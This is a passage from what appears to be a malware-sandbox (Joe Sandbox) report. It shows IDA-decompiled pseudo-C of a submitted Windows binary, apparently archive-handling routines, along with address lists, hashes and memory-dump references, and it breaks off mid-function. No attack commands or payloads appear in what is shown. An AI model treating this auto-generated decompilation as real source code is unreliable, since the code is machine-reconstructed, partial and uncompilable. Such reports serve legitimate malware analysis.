								_t297[1] = _t460 - 1;
								 *(_t469 - 0x20) = 0 | _t297[1] != 0x00000000;
								if(_t460 == 1) {
									E0040A26D( *(_t469 - 0x1c) + 0x30, _t469 - 0x18c);
									E00403204(E00403204(E004037D2( *(_t469 - 0x1c) + 0x24, _t469 - 0x12c),  *((intOrPtr*)(_t469 - 0x58))),  *(_t469 - 0x34));
									 *(_t469 - 4) = 4;
									_t362 = _t469 - 0x19c;
									E00402F6E(_t362);
									_t306 =  *(_t469 - 0x18);
									 *(_t469 - 4) = 3;
									__eflags = _t306;
									if(_t306 != 0) {
										_t362 =  *_t306;
										 *((intOrPtr*)(_t362 + 8))(_t306);
									}
									_t307 =  *(_t469 - 0x14);
									 *(_t469 - 4) = 2;
									__eflags = _t307;
									if(_t307 != 0) {
										_t362 =  *_t307;
										 *((intOrPtr*)(_t362 + 8))(_t307);
									}
									_t308 =  *(_t469 - 0x10);
									 *(_t469 - 4) =  *(_t469 - 4) | 0xffffffff;
									__eflags = _t308;
									if(_t308 != 0) {
										_t362 =  *_t308;
										 *((intOrPtr*)(_t362 + 8))(_t308);
									}
									L63:
									_t441 = 0;
									__eflags = 0;
									goto L64;
								} else {
									__eflags = _t460;
									if(_t460 != 0) {
										L66:
										E00403204(E00403204(_t298,  *((intOrPtr*)(_t469 - 0x58))),  *(_t469 - 0x34));
										 *(_t469 - 4) = 4;
										E00402F6E(_t469 - 0x19c);
										_t315 =  *(_t469 - 0x18);
										 *(_t469 - 4) = 3;
										__eflags = _t315;
										if(_t315 != 0) {
											 *((intOrPtr*)( *_t315 + 8))(_t315);
										}
										_t316 =  *(_t469 - 0x14);
										 *(_t469 - 4) = 2;
										__eflags = _t316;
										if(_t316 != 0) {
											 *((intOrPtr*)( *_t316 + 8))(_t316);
										}
										_t317 =  *(_t469 - 0x10);
										 *(_t469 - 4) =  *(_t469 - 4) | 0xffffffff;
										__eflags = _t317;
										if(_t317 != 0) {
											 *((intOrPtr*)( *_t317 + 8))(_t317);
										}
										goto L72;
									}
									_t460 = E00409863( *(_t469 - 0x4c),  *(_t469 - 0x24), _t469 - 0x100, _t469 - 0xf8);
									__eflags = _t460;
									if(_t460 != 0) {
										goto L66;
									}
									_push(_t469 - 0x19c);
									E00403204(E00403204(E0040B397( *(_t469 - 0x1c)),  *((intOrPtr*)(_t469 - 0x58))),  *(_t469 - 0x34));
									 *(_t469 - 4) = 4;
									E00402F6E(_t469 - 0x19c);
									_t328 =  *(_t469 - 0x18);
									 *(_t469 - 4) = 3;
									__eflags = _t328;
									if(_t328 != 0) {
										 *((intOrPtr*)( *_t328 + 8))(_t328);
									}
									_t329 =  *(_t469 - 0x14);
									 *(_t469 - 4) = 2;
									__eflags = _t329;
									if(_t329 != 0) {
										 *((intOrPtr*)( *_t329 + 8))(_t329);
									}
									_t330 =  *(_t469 - 0x10);
									 *(_t469 - 4) =  *(_t469 - 4) | 0xffffffff;
									__eflags = _t330;
									if(_t330 != 0) {
										 *((intOrPtr*)( *_t330 + 8))(_t330);
									}
									continue;
								}
							}
							E0040AF06(_t469 - 0x27c);
							 *(_t469 - 4) = 0;
							E004037D2(_t469 - 0x200, _t356 + 0x44);
							E004037D2(_t469 - 0x20c, _t356 + 0x44);
							 *(_t469 - 0x1e4) =  *(_t469 - 0x1e4) | 0xffffffff;
							_t341 = E0040A53F(_t469 - 0x27c, _t356); // executed
							_t460 = _t341;
							__eflags = _t460;
							if(_t460 != 0) {
								__eflags = _t460 - 1;
								if(_t460 == 1) {
									E0040A26D( *(_t469 - 0x1c) + 0x30, _t469 - 0x23c);
									E004037D2( *(_t469 - 0x1c) + 0x24, _t469 - 0x20c);
								}
								 *(_t469 - 4) =  *(_t469 - 4) | 0xffffffff;
								E00402F6E(_t469 - 0x27c);
								goto L72;
							} else {
								_push(_t469 - 0x27c);
								E0040B397( *(_t469 - 0x1c));
								 *(_t469 - 4) =  *(_t469 - 4) | 0xffffffff;
								E00402F6E(_t469 - 0x27c);
								 *(_t469 - 0x20) =  *(_t469 - 0x20) & 0x00000000;
								_t241 = E004028F5(_t469 - 0x29c);
								_t360 = 8;
								_t244 = memcpy(_t356 + 8, _t241, _t360 << 2);
								_t472 = _t472 + 0xc;
								__eflags =  *_t244 - 1;
								if( *_t244 < 1) {
									goto L7;
								}
								goto L3;
							}
						}
						L7:
						_t362 =  *(_t469 - 0x1c);
						__eflags =  *((intOrPtr*)(_t362 + 4)) - 0x20;
						if( *((intOrPtr*)(_t362 + 4)) >= 0x20) {
							goto L63;
						}
						goto L8;
					}
				} else {
					_t246 = 0x80004001;
					L65:
					 *[fs:0x0] =  *((intOrPtr*)(_t469 - 0xc));
					return _t246;
				}
			}

0x0040a90f
0x0040a914
0x0040a91d
0x0040a920
0x0040a925
0x0040a931
0x0040a93d
0x0040a93d
0x0040a94a
0x0040a959
0x0040a95a
0x0040a95a
0x0040a95c
0x0040a95f
0x00000000
0x00000000
0x0040a961
0x0040a967
0x0040a96f
0x0040a972
0x0040a975
0x0040a97b
0x0040a97d
0x0040a9a0
0x0040a9a1
0x0040a9a1
0x0040a9a1
0x0040a9a3
0x0040a9aa
0x00000000
0x00000000
0x00000000
0x0040a97f
0x0040a98f
0x0040a990
0x0040a990
0x0040a9b0
0x0040a9b8
0x0040a9bc
0x0040a9bc
0x0040a9cd
0x0040a9cd
0x0040a9d0
0x0040a9d2
0x0040a9d5
0x0040a9d7
0x0040aa44
0x0040aa46
0x0040aa4a
0x0040aa4d
0x0040aa4f
0x0040aa4f
0x0040aa56
0x0040aa5a
0x0040aa5e
0x0040aa61
0x0040aa6c
0x0040aa73
0x0040aa76
0x0040aa78
0x0040ad22
0x0040ad25
0x0040ad27
0x0040aeb0
0x0040aeb0
0x00000000
0x0040aeb0
0x0040aa7e
0x0040aa83
0x0040aef9
0x0040aefc
0x0040aefc
0x0040ae3c
0x0040ae3c
0x0040ae3f
0x0040ae42
0x0040ae42
0x0040ae45
0x0040ae48
0x00000000
0x0040ae48
0x0040aa8f
0x0040aa92
0x0040aa98
0x0040aa9b
0x0040aa9d
0x00000000
0x00000000
0x0040aaa6
0x0040aaa9
0x0040aaac
0x00000000
0x00000000
0x0040aab2
0x0040aab7
0x0040aaba
0x0040aac5
0x0040aac8
0x0040aacf
0x0040aad1
0x0040aad3
0x0040aad6
0x0040aef3
0x0040aef3
0x0040aeda
0x0040aeda
0x0040aedc
0x0040aee2
0x0040aee5
0x0040aee5
0x00000000
0x0040aedc
0x0040aadc
0x0040aade
0x00000000
0x00000000
0x0040aae4
0x0040aae7
0x0040aaed
0x0040aaf5
0x0040aaf8
0x0040aafa
0x0040aafd
0x0040aeed
0x0040aeed
0x0040aec9
0x0040aec9
0x0040aecb
0x0040aecd
0x0040aed0
0x0040aed0
0x0040aed3
0x0040aed3
0x0040aed3
0x0040aed7
0x00000000
0x0040aed7
0x0040ab03
0x0040ab05
0x00000000
0x00000000
0x0040ab0b
0x0040ab0e
0x0040ab1a
0x0040ab1e
0x0040ab20
0x0040ab22
0x0040ab25
0x0040aeb4
0x0040aeb4
0x0040aeb6
0x0040aeba
0x0040aebc
0x0040aebf
0x0040aebf
0x0040aec2
0x0040aec5
0x00000000
0x0040aec5
0x0040ab2b
0x0040ab2d
0x00000000
0x00000000
0x0040ab39
0x0040ab47
0x0040ab4e
0x0040ab53
0x0040ab55
0x0040ab58
0x0040ad37
0x0040ad3b
0x0040ad40
0x0040ad43
0x0040ad47
0x0040ad49
0x0040ad4e
0x0040ad4e
0x0040ad51
0x0040ad54
0x0040ad58
0x0040ad5a
0x0040ad5f
0x0040ad5f
0x0040ad62
0x0040ad65
0x0040ad69
0x0040ad6b
0x0040ad70
0x0040ad70
0x0040ad73
0x00000000
0x0040ad73
0x0040ab60
0x0040ab6b
0x0040ab70
0x0040ab72
0x0040ab75
0x0040ad81
0x0040ad85
0x0040ad8a
0x0040ad8d
0x0040ad91
0x0040ad93
0x0040ad98
0x0040ad98
0x0040ad9b
0x0040ad9e
0x0040ada2
0x0040ada4
0x0040ada9
0x0040ada9
0x0040adac
0x0040adaf
0x0040adb3
0x0040adb5
0x0040adba
0x0040adba
0x0040adbd
0x00000000
0x0040adbd
0x0040ab7b
0x0040ab7e
0x0040ab80
0x0040ab82
0x0040ab91
0x0040ab95
0x0040ab97
0x0040ab9a
0x0040ab9c
0x0040aba7
0x0040abaa
0x0040abaa
0x0040abad
0x0040abaf
0x0040abb3
0x0040abb8
0x0040abb8
0x0040abb3
0x0040abbb
0x0040abc1
0x0040abc4
0x0040abc7
0x0040abd0
0x0040abd4
0x0040abdd
0x0040abe6
0x0040abf0
0x0040abf4
0x0040abf4
0x0040abf6
0x0040abfc
0x0040ac00
0x0040ac09
0x0040ac13
0x0040ac21
0x0040ac27
0x0040ac30
0x0040ac36
0x0040ac38
0x0040ac3d
0x0040ac45
0x0040ac48
0x0040ac4b
0x0040add2
0x0040adf1
0x0040adf7
0x0040adfc
0x0040ae02
0x0040ae07
0x0040ae0a
0x0040ae0e
0x0040ae10
0x0040ae12
0x0040ae15
0x0040ae15
0x0040ae18
0x0040ae1b
0x0040ae1f
0x0040ae21
0x0040ae23
0x0040ae26
0x0040ae26
0x0040ae29
0x0040ae2c
0x0040ae30
0x0040ae32
0x0040ae34
0x0040ae37
0x0040ae37
0x0040ae3a
0x0040ae3a
0x0040ae3a
0x00000000
0x0040ac51
0x0040ac51
0x0040ac53
0x0040ae5c
0x0040ae67
0x0040ae6d
0x0040ae78
0x0040ae7d
0x0040ae80
0x0040ae84
0x0040ae86
0x0040ae8b
0x0040ae8b
0x0040ae8e
0x0040ae91
0x0040ae95
0x0040ae97
0x0040ae9c
0x0040ae9c
0x0040ae9f
0x0040aea2
0x0040aea6
0x0040aea8
0x0040aead
0x0040aead
0x00000000
0x0040aea8
0x0040ac72
0x0040ac74
0x0040ac76
0x00000000
0x00000000
0x0040ac85
0x0040ac96
0x0040ac9c
0x0040aca7
0x0040acac
0x0040acaf
0x0040acb3
0x0040acb5
0x0040acba
0x0040acba
0x0040acbd
0x0040acc0
0x0040acc4
0x0040acc6
0x0040accb
0x0040accb
0x0040acce
0x0040acd1
0x0040acd5
0x0040acd7
0x0040ace0
0x0040ace0
0x00000000
0x0040acd7
0x0040ac4b
0x0040a9df
0x0040a9ee
0x0040a9f1
0x0040a9fd
0x0040aa02
0x0040aa10
0x0040aa15
0x0040aa17
0x0040aa19
0x0040ace8
0x0040aceb
0x0040acfa
0x0040ad09
0x0040ad09
0x0040ad0e
0x0040ad18
0x00000000
0x0040aa1f
0x0040aa28
0x0040aa29
0x0040aa2e
0x0040aa38
0x0040a93d
0x0040a94a
0x0040a959
0x0040a95a
0x0040a95a
0x0040a95c
0x0040a95f
0x00000000
0x00000000
0x00000000
0x0040a95f
0x0040aa19
0x0040a9c0
0x0040a9c0
0x0040a9c3
0x0040a9c7
0x00000000
0x00000000
0x00000000
0x0040a9c7
0x0040a933
0x0040a933
0x0040ae4b
0x0040ae51
0x0040ae59
0x0040ae59

APIs

__EH_prolog.LIBCMT ref: 0040A90F

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 03cf4591cf909b2d04c6413f81e879f8fbbf87ed20dd82c53fd02e17f46b7009
Instruction ID: 25566729ef2c52a6845be5edffbec3a608f7ce3cf95c208b8dc0a298da87cac0
Opcode Fuzzy Hash: 03cf4591cf909b2d04c6413f81e879f8fbbf87ed20dd82c53fd02e17f46b7009
Instruction Fuzzy Hash: 24128E71900209DFCF10DFA4C888ADEBBB5AF48314F2485AAE459BB2D1D738AE45CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00401F26, Relevance: 1.8, APIs: 1, Instructions: 347
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00401F26() {
				void* __ebx;
				signed int _t153;
				intOrPtr* _t155;
				signed int _t156;
				signed int _t163;
				intOrPtr* _t164;
				signed int _t165;
				signed int _t166;
				intOrPtr* _t167;
				intOrPtr* _t171;
				signed int _t172;
				intOrPtr* _t174;
				signed int _t175;
				signed int _t177;
				signed int _t185;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				void* _t197;
				signed int _t207;
				void* _t209;
				signed int _t230;
				WCHAR* _t270;
				signed int _t289;
				signed int* _t291;
				signed int _t292;
				signed int _t294;
				intOrPtr* _t296;
				signed int _t297;
				void* _t298;

				E00418D80(E00419577, _t298);
				_t294 =  *(_t298 + 8);
				if(E004023F0(_t294 + 0xa8) == 0) {
					_t153 =  *(_t294 + 0x4c);
					__eflags = _t153;
					if(_t153 != 0) {
						 *((intOrPtr*)( *_t153 + 8))(_t153);
						 *(_t294 + 0x4c) = 0;
					}
					E0040368D(_t298 - 0x28);
					 *((intOrPtr*)(_t298 - 4)) = 0;
					 *(_t298 - 0x1c) = 0;
					 *((short*)(_t298 - 0x1a)) = 0;
					 *(_t298 - 0x14) = 0;
					_t155 =  *((intOrPtr*)(_t294 + 0xc));
					_t289 =  *(_t298 + 0xc);
					 *((char*)(_t298 - 4)) = 1;
					_t156 =  *((intOrPtr*)( *_t155 + 0x18))(_t155, _t289, 3, _t298 - 0x1c);
					__eflags = _t156;
					if(_t156 == 0) {
						__eflags =  *(_t298 - 0x1c);
						if( *(_t298 - 0x1c) != 0) {
							__eflags =  *(_t298 - 0x1c) - 8;
							if( *(_t298 - 0x1c) == 8) {
								E0040387D(_t156, _t298 - 0x28,  *(_t298 - 0x14));
								L12:
								E004037D2(_t294 + 0x1c, _t298 - 0x28);
								 *((char*)(_t298 - 4)) = 0;
								E00405DEF(_t298 - 0x1c);
								__eflags =  *(_t298 + 0x14);
								if( *(_t298 + 0x14) != 0) {
									_t161 =  *(_t298 + 0x10);
									 *( *(_t298 + 0x10)) = 0;
									L60:
									E00403204(_t161,  *((intOrPtr*)(_t298 - 0x28)));
									_t163 = 0;
									__eflags = 0;
									goto L61;
								}
								 *(_t298 - 0x1c) = 0;
								 *((short*)(_t298 - 0x1a)) = 0;
								 *(_t298 - 0x14) = 0;
								_t164 =  *((intOrPtr*)(_t294 + 0xc));
								 *((char*)(_t298 - 4)) = 2;
								_t165 =  *((intOrPtr*)( *_t164 + 0x18))(_t164, _t289, 9, _t298 - 0x1c);
								__eflags = _t165;
								if(_t165 == 0) {
									__eflags =  *(_t298 - 0x1c);
									if( *(_t298 - 0x1c) != 0) {
										__eflags =  *(_t298 - 0x1c) - 0x13;
										if( *(_t298 - 0x1c) == 0x13) {
											_t166 =  *(_t298 - 0x14);
											L20:
											 *(_t294 + 0x44) = _t166;
											_t167 =  *((intOrPtr*)(_t294 + 0xc));
											_t165 =  *((intOrPtr*)( *_t167 + 0x18))(_t167, _t289, 6, _t298 - 0x1c);
											__eflags = _t165;
											if(_t165 != 0) {
												goto L14;
											}
											__eflags =  *(_t298 - 0x14);
											 *(_t298 + 0xb) = 0;
											 *((short*)(_t298 - 0x50)) = 0;
											 *((short*)(_t298 - 0x4e)) = 0;
											 *(_t294 + 0x40) = _t165 & 0xffffff00 |  *(_t298 - 0x14) != 0x00000000;
											 *(_t298 - 0x48) = 0;
											_t171 =  *((intOrPtr*)(_t294 + 0xc));
											 *((char*)(_t298 - 4)) = 3;
											_t172 =  *((intOrPtr*)( *_t171 + 0x18))(_t171, _t289, 0x15, _t298 - 0x50);
											__eflags = _t172;
											 *(_t298 + 0xc) = _t172;
											if(_t172 == 0) {
												__eflags =  *((short*)(_t298 - 0x50)) - 0xb;
												if( *((short*)(_t298 - 0x50)) == 0xb) {
													__eflags =  *(_t298 - 0x48);
													_t63 = _t298 + 0xb;
													 *_t63 =  *(_t298 - 0x48) != 0;
													__eflags =  *_t63;
												}
												 *((char*)(_t298 - 4)) = 2;
												E00405DEF(_t298 - 0x50);
												_t174 =  *((intOrPtr*)(_t294 + 0xc));
												_t165 =  *((intOrPtr*)( *_t174 + 0x18))(_t174, _t289, 0xc, _t298 - 0x1c);
												__eflags = _t165;
												if(_t165 != 0) {
													goto L14;
												} else {
													_t175 =  *(_t298 - 0x1c) & 0x0000ffff;
													__eflags = _t175;
													if(__eflags == 0) {
														_t291 = _t294 + 0x38;
														 *_t291 =  *(_t294 + 0x5c);
														_t177 =  *(_t294 + 0x60);
														L30:
														_t291[1] = _t177;
														 *((intOrPtr*)(_t298 - 0x34)) = 0;
														 *(_t298 - 0x30) = 0;
														 *((intOrPtr*)(_t298 - 0x2c)) = 0;
														 *((char*)(_t298 - 4)) = 4;
														E004041F8(_t298 - 0x28, _t298 - 0x34, __eflags);
														__eflags =  *(_t298 - 0x30);
														if(__eflags != 0) {
															E00403740(_t298 - 0x5c, __eflags, _t298 - 0x28);
															__eflags =  *(_t294 + 0x40);
															 *((char*)(_t298 - 4)) = 5;
															if( *(_t294 + 0x40) == 0) {
																E004024B5(_t298 - 0x34);
															}
															__eflags =  *(_t298 - 0x30);
															if( *(_t298 - 0x30) != 0) {
																__eflags =  *(_t298 + 0xb);
																if(__eflags == 0) {
																	_push(_t298 - 0x34);
																	E00401E92(_t294, __eflags);
																}
															}
															E00403632(_t298 - 0x40, _t294 + 0x10, _t298 - 0x5c);
															__eflags =  *(_t294 + 0x40);
															 *((char*)(_t298 - 4)) = 6;
															if( *(_t294 + 0x40) == 0) {
																E00404D7D(_t298 - 0x94);
																E0040368D(_t298 - 0x6c);
																 *((char*)(_t298 - 4)) = 7;
																_t185 = E00404DAF(_t298 - 0x94, __eflags,  *((intOrPtr*)(_t298 - 0x40))); // executed
																__eflags = _t185;
																if(__eflags == 0) {
																	L47:
																	__eflags =  *(_t298 + 0xb);
																	if( *(_t298 + 0xb) != 0) {
																		L58:
																		E00403204(E00403204(E00403204(E004037D2(_t294 + 0x28, _t298 - 0x40),  *((intOrPtr*)(_t298 - 0x6c))),  *((intOrPtr*)(_t298 - 0x40))),  *((intOrPtr*)(_t298 - 0x5c)));
																		 *((char*)(_t298 - 4)) = 2;
																		E00410DA8(0, _t298 - 0x34);
																		_t161 = E00405DEF(_t298 - 0x1c);
																		goto L60;
																	}
																	_push(0x18);
																	_t192 = E004031DD();
																	__eflags = _t192;
																	if(_t192 == 0) {
																		_t292 = 0;
																		__eflags = 0;
																	} else {
																		 *((intOrPtr*)(_t192 + 4)) = 0;
																		 *(_t192 + 8) =  *(_t192 + 8) | 0xffffffff;
																		 *_t192 = 0x41b600;
																		_t292 = _t192;
																	}
																	__eflags = _t292;
																	 *(_t294 + 0x48) = _t292;
																	 *(_t298 + 8) = _t292;
																	if(_t292 != 0) {
																		 *((intOrPtr*)( *_t292 + 4))(_t292);
																	}
																	_t193 =  *(_t294 + 0x48);
																	 *((intOrPtr*)(_t193 + 0x10)) = 0;
																	 *((char*)(_t298 - 4)) = 8;
																	 *((intOrPtr*)(_t193 + 0x14)) = 0;
																	_t194 = E00405489( *((intOrPtr*)(_t298 - 0x40)), 1);
																	__eflags = _t194;
																	if(_t194 != 0) {
																		E004063E5(_t294 + 0x4c, _t292);
																		 *((char*)(_t298 - 4)) = 7;
																		 *( *(_t298 + 0x10)) = _t292;
																		goto L58;
																	} else {
																		_t197 = E004038D0(_t294 + 0xe4,  *0x41b5ac);
																		__eflags = _t292;
																		 *((char*)(_t298 - 4)) = 7;
																		if(_t292 != 0) {
																			_t197 =  *((intOrPtr*)( *_t292 + 8))(_t292);
																		}
																		E00403204(E00403204(E00403204(_t197,  *((intOrPtr*)(_t298 - 0x6c))),  *((intOrPtr*)(_t298 - 0x40))),  *((intOrPtr*)(_t298 - 0x5c)));
																		 *((char*)(_t298 - 4)) = 2;
																		E00410DA8(0, _t298 - 0x34);
																		E00403204(E00405DEF(_t298 - 0x1c),  *((intOrPtr*)(_t298 - 0x28)));
																		_t163 = 0x80004005;
																		goto L61;
																	}
																}
																_t207 = E00404643( *((intOrPtr*)(_t298 - 0x40)), __eflags);
																__eflags = _t207;
																if(_t207 != 0) {
																	goto L47;
																}
																_t209 = E00403204(E004038D0(_t294 + 0xe4,  *0x41b5a8),  *((intOrPtr*)(_t298 - 0x6c)));
																_t230 = 0x80004005;
																goto L44;
															} else {
																_t296 = _t294 + 0x28;
																E004037D2(_t296, _t298 - 0x40);
																__eflags =  *(_t298 + 0xb);
																_t270 =  *_t296;
																if( *(_t298 + 0xb) == 0) {
																	_t209 = E00404419(_t270, 0, 0, _t291);
																} else {
																	_t209 = E00404470(_t270);
																}
																L44:
																E00403204(E00403204(_t209,  *((intOrPtr*)(_t298 - 0x40))),  *((intOrPtr*)(_t298 - 0x5c)));
																L45:
																 *((char*)(_t298 - 4)) = 2;
																E00410DA8(_t230, _t298 - 0x34);
																L46:
																E00403204(E00405DEF(_t298 - 0x1c),  *((intOrPtr*)(_t298 - 0x28)));
																_t163 = _t230;
																goto L61;
															}
														}
														_t230 = 0x80004005;
														goto L45;
													}
													__eflags = _t175 - 0x40;
													if(__eflags != 0) {
														goto L18;
													}
													_t291 = _t294 + 0x38;
													 *_t291 =  *(_t298 - 0x14);
													_t177 =  *(_t298 - 0x10);
													goto L30;
												}
											}
											E00405DEF(_t298 - 0x50);
											E00403204(E00405DEF(_t298 - 0x1c),  *((intOrPtr*)(_t298 - 0x28)));
											_t163 =  *(_t298 + 0xc);
											goto L61;
										}
										L18:
										_t230 = 0x80004005;
										goto L46;
									}
									_t166 =  *(_t294 + 0x64);
									goto L20;
								}
								L14:
								_t230 = _t165;
								goto L46;
							}
							_t297 = 0x80004005;
							goto L10;
						}
						E004037D2(_t298 - 0x28, _t294 + 0x50);
						goto L12;
					} else {
						_t297 = _t156;
						L10:
						E00403204(E00405DEF(_t298 - 0x1c),  *((intOrPtr*)(_t298 - 0x28)));
						_t163 = _t297;
						goto L61;
					}
				} else {
					_t163 = 0x80004004;
					L61:
					 *[fs:0x0] =  *((intOrPtr*)(_t298 - 0xc));
					return _t163;
				}
			}

0x00401f2b
0x00401f38
0x00401f49
0x00401f55
0x00401f5a
0x00401f5c
0x00401f61
0x00401f64
0x00401f64
0x00401f6a
0x00401f6f
0x00401f72
0x00401f76
0x00401f7a
0x00401f7d
0x00401f80
0x00401f86
0x00401f91
0x00401f94
0x00401f96
0x00401f9c
0x00401fa0
0x00401fb0
0x00401fb5
0x00401fda
0x00401fdf
0x00401fe6
0x00401fee
0x00401ff1
0x00401ff6
0x00401ff9
0x00402338
0x0040233b
0x0040233d
0x00402340
0x00402346
0x00402346
0x00000000
0x00402346
0x00401fff
0x00402003
0x00402007
0x0040200a
0x00402017
0x0040201b
0x0040201e
0x00402020
0x00402029
0x0040202d
0x00402034
0x00402039
0x00402045
0x00402048
0x00402048
0x0040204b
0x00402058
0x0040205b
0x0040205d
0x00000000
0x00000000
0x0040205f
0x00402063
0x00402066
0x0040206a
0x00402071
0x00402074
0x00402077
0x00402084
0x00402088
0x0040208b
0x0040208d
0x00402090
0x004020b3
0x004020b8
0x004020ba
0x004020be
0x004020be
0x004020be
0x004020be
0x004020c5
0x004020c9
0x004020ce
0x004020db
0x004020de
0x004020e0
0x00000000
0x004020e6
0x004020e6
0x004020ea
0x004020ec
0x00402107
0x0040210a
0x0040210c
0x0040210f
0x0040210f
0x00402112
0x00402115
0x00402118
0x00402121
0x00402125
0x0040212a
0x0040212d
0x00402140
0x00402145
0x00402148
0x0040214c
0x00402151
0x00402151
0x00402156
0x00402159
0x0040215b
0x0040215e
0x00402165
0x00402166
0x00402166
0x0040215e
0x00402175
0x0040217a
0x0040217d
0x00402181
0x004021b0
0x004021b8
0x004021c6
0x004021ca
0x004021cf
0x004021d1
0x00402234
0x00402234
0x00402237
0x004022fb
0x0040231a
0x00402325
0x00402329
0x00402331
0x00000000
0x00402331
0x0040223d
0x0040223f
0x00402244
0x00402247
0x0040225a
0x0040225a
0x00402249
0x00402249
0x0040224c
0x00402250
0x00402256
0x00402256
0x0040225c
0x0040225e
0x00402261
0x00402264
0x00402269
0x00402269
0x0040226f
0x00402275
0x0040227b
0x0040227f
0x00402282
0x00402287
0x00402289
0x004022ed
0x004022f5
0x004022f9
0x00000000
0x0040228b
0x00402297
0x0040229c
0x0040229e
0x004022a2
0x004022a7
0x004022a7
0x004022bd
0x004022c8
0x004022cc
0x004022dc
0x004022e2
0x00000000
0x004022e2
0x00402289
0x004021d6
0x004021db
0x004021dd
0x00000000
0x00000000
0x004021f3
0x004021f9
0x00000000
0x00402183
0x00402183
0x0040218c
0x00402191
0x00402194
0x00402196
0x004021a3
0x00402198
0x00402198
0x00402198
0x004021fe
0x00402209
0x00402210
0x00402213
0x00402217
0x0040221c
0x00402227
0x0040222d
0x00000000
0x0040222d
0x00402181
0x0040212f
0x00000000
0x0040212f
0x004020ee
0x004020f1
0x00000000
0x00000000
0x004020fa
0x004020fd
0x004020ff
0x00000000
0x004020ff
0x004020e0
0x00402095
0x004020a5
0x004020aa
0x00000000
0x004020ad
0x0040203b
0x0040203b
0x00000000
0x0040203b
0x0040202f
0x00000000
0x0040202f
0x00402022
0x00402022
0x00000000
0x00402022
0x00401fb7
0x00000000
0x00401fb7
0x00401fa9
0x00000000
0x00401f98
0x00401f98
0x00401fbc
0x00401fc7
0x00401fcd
0x00000000
0x00401fcd
0x00401f4b
0x00401f4b
0x00402348
0x0040234e
0x00402356
0x00402356

APIs

__EH_prolog.LIBCMT ref: 00401F2B

Part of subcall function 004023F0: EnterCriticalSection.KERNEL32(?,?,?,0040B84D), ref: 004023F5
Part of subcall function 004023F0: LeaveCriticalSection.KERNEL32(?,?,?,?,0040B84D), ref: 004023FF

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: CriticalSection$EnterH_prologLeave
String ID:
API String ID: 367238759-0
Opcode ID: 220cea634fa4220f2899e35a25b328741d65bd45df79bc03c8ba1a60db2c5a6d
Instruction ID: 9aea0566c9c0e61cfee338e95f65c5ac720cc4bbfeed0489b5d27597e260e310
Opcode Fuzzy Hash: 220cea634fa4220f2899e35a25b328741d65bd45df79bc03c8ba1a60db2c5a6d
Instruction Fuzzy Hash: 62D19E7090020ADFCF10EFA5C9849EEBBB5AF54308F14846FE506B72D1DB786A46CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00410864, Relevance: 1.7, APIs: 1, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00410864(intOrPtr* __ecx) {
				void* __ebx;
				char* _t105;
				signed char _t106;
				signed int _t107;
				intOrPtr* _t111;
				signed char _t113;
				void* _t114;
				void* _t117;
				signed char _t121;
				void* _t127;
				void* _t139;
				signed char _t140;
				intOrPtr _t151;
				void* _t154;
				signed int _t176;
				signed char _t178;
				intOrPtr _t180;
				intOrPtr* _t183;
				signed char _t185;
				void* _t186;
				signed int _t192;
				void* _t194;

				E00418D80(E0041A5EC, _t186);
				_t180 =  *((intOrPtr*)(_t186 + 8));
				_t183 = __ecx;
				E0040E6A5(_t180);
				 *((intOrPtr*)(_t180 + 0x100)) =  *((intOrPtr*)(__ecx + 0x40));
				 *((intOrPtr*)(_t180 + 0x104)) =  *((intOrPtr*)(__ecx + 0x44));
				_t105 = _t180 + 0xf8;
				 *_t105 =  *((intOrPtr*)(__ecx + 0x56));
				 *((char*)(_t180 + 0xf9)) =  *((intOrPtr*)(__ecx + 0x57));
				if( *_t105 != 0) {
					L16:
					_t106 = 1;
					L17:
					 *[fs:0x0] =  *((intOrPtr*)(_t186 - 0xc));
					return _t106;
				}
				 *(_t186 - 0x18) =  *(__ecx + 0x60);
				 *(_t186 - 0x14) =  *(__ecx + 0x64);
				_t107 =  *(__ecx + 0x5c);
				 *(_t186 - 0x10) =  *(__ecx + 0x68);
				 *((intOrPtr*)(_t186 + 8)) =  *((intOrPtr*)(__ecx + 0x6c));
				_t151 = 0x20;
				 *(_t186 - 0x1c) = _t107;
				 *((intOrPtr*)(_t180 + 0x140)) = _t151;
				asm("adc ebx, 0x0");
				 *((intOrPtr*)(_t180 + 0x108)) =  *((intOrPtr*)(__ecx + 0x40)) + _t151;
				 *((intOrPtr*)(_t180 + 0x10c)) =  *((intOrPtr*)(__ecx + 0x44));
				 *(_t180 + 0x148) =  *(_t180 + 0x148) & 0;
				_t192 =  *(_t186 - 0x18);
				 *(_t180 + 0x144) = 0;
				if(_t192 < 0 || _t192 <= 0 && _t107 < 0) {
					goto L16;
				} else {
					_t194 =  *(_t186 - 0x10) - 0x40000000;
					if(_t194 > 0 || _t194 >= 0 &&  *(_t186 - 0x14) > 0) {
						goto L16;
					} else {
						if(( *(_t186 - 0x14) |  *(_t186 - 0x10)) != 0) {
							__eflags =  *((char*)(_t180 + 0x14c));
							if( *((char*)(_t180 + 0x14c)) == 0) {
								 *(_t180 + 0x148) = 1;
							}
							asm("adc ebx, 0x0");
